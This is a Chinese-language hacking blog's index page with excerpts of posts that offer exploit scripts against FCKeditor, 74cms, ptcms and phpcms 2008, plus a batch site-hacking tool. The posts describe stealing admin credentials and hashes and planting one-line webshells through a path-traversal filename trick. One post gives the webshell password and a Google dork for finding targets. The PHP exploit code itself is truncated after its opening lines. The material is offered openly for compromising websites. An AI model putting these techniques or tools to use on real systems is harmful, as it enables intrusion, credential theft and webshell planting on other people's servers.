FCKeditor-Exp通杀0day

分类:安全 | 2012-04-19 | 撸过 1,782 次
1人扯谈

 

FCKeditor-Exp

来源与www.x7z.org

Botak_XH Q493499867

----------------------------------------------------------------------------------

<?php

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

$match = array();

func[......]

继续阅读

很久以前的EXP 74cms 漏洞!

分类:安全 | 2012-02-25 | 撸过 765 次
1人扯谈

不解释了!

<?php
/*
骑士CMS漏洞利用Exp
Author:mer4en7y[90sec Team]
Home:www.90sec.org
声明:漏洞发现者:毅心毅意(发布在t00ls)
在日站的时候,碰到了这个系统,于是搞了这么个EXP,
水平有限,写的粗糙了点,忘大牛无见笑
大部分代码参考了子仪牛
*/
/*利用方法:$host:主机,$user修改为注册的用户名
$pwd修改为注册用户密码
登陆-->查看个人资料-->
在email处即可看到admin账号\密码\Hash
*/
error_reporting(0);
ini_set(max_execution[......]

继续阅读

ptcms小说小偷程序 最新EXP漏洞

分类:安全 | 2012-02-19 | 撸过 888 次
2人扯谈

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

 

http://www.webshell.cc/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

<?php
//error_reporting(0);
print_r('
+------------------------------------------------------------------------[......]

继续阅读

Exps1.0 EXP批量抓站工具

分类:工具 | 2012-02-19 | 撸过 1,028 次
1人扯谈

牛XX 我啥也不说了 自己看着弄把!

工具Exps_1.0

教程:exps_1.0_使用

 

phpcms 2008最新0day加批量EXP

分类:安全 | 2011-11-3 | 撸过 1,260 次
2人扯谈

玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c

EXP:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
PHPCMS Remote Code Inject GetShell Exploit
Google Dork:Powered by Phpcms 2008
code by secr
+-------------------------------------------------[......]

继续阅读